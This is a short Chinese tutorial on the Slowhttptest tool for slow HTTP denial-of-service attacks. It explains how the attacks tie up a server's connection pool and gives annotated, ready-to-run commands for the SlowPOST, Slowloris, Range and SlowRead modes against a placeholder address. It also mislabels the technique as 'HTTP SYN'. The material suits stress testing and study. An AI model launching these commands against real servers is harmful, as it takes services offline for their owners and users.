HTTP应用层拒绝服务攻击工具---Slowhttptest

1. Slowhttptest

1.1. HTTP应用层拒绝服务攻击工具

• 利用低带宽慢速拒绝服务（HTTP SYN)
• 针对apache,、tomcat(最新版已修复此漏洞）
• ulimite -n 70000
• 支持代理

2. 原理

• 大量消耗目标并发连接池
• 缓慢发送不完整的HTTP请求，服务器等待并保持连接

3. 方式

• SlowPOST:content-length声明长度，但body部分缓慢发送

slowhttptest -c 8000 -B -g -o body_status -i 110 -r 200 -s 8192 -t FAKEVERB -u http://1.1.1.1 -x 10 -p 3
# -c ---------------- 连接数
# -B ---------------- slow Body 方式
# -g -o ------------- 生成结果
# -i ---------------- 发送数据的时间间隔
# -r ---------------- 每秒钟建立多少个连接
# -s ---------------- 发送多少个字节
# -t ---------------- 请求方式（可以GET，POST也可以随意伪造一个）
# -u ---------------- 目标服务器地址
# -x ---------------- 一次最大发多少个字节 
# -p ---------------- 超时

• Slowloris:http请求头只发一个\r\n(正常是两个）

slowhttptest -c 8000 -H -g -o header_status -i 10  -r 200 -t GET -u http://1.1.1.1 -x 24 -p 3
# -H ----- Slowloris方式

• Range:向服务器发送恶意请求范围

slowhttptest -R -u http://1.1.1.1 -t HEAD -c 8000 -a 10  -b 3000  -r 500

• SlowRead:慢速读取接收服务器返回数据

slowhttptest -c 8000 -X -r 200 -w 512 -y 1024 -n 5 -z 32 -k 3 -u https://1.1.1.1/index.html -p 3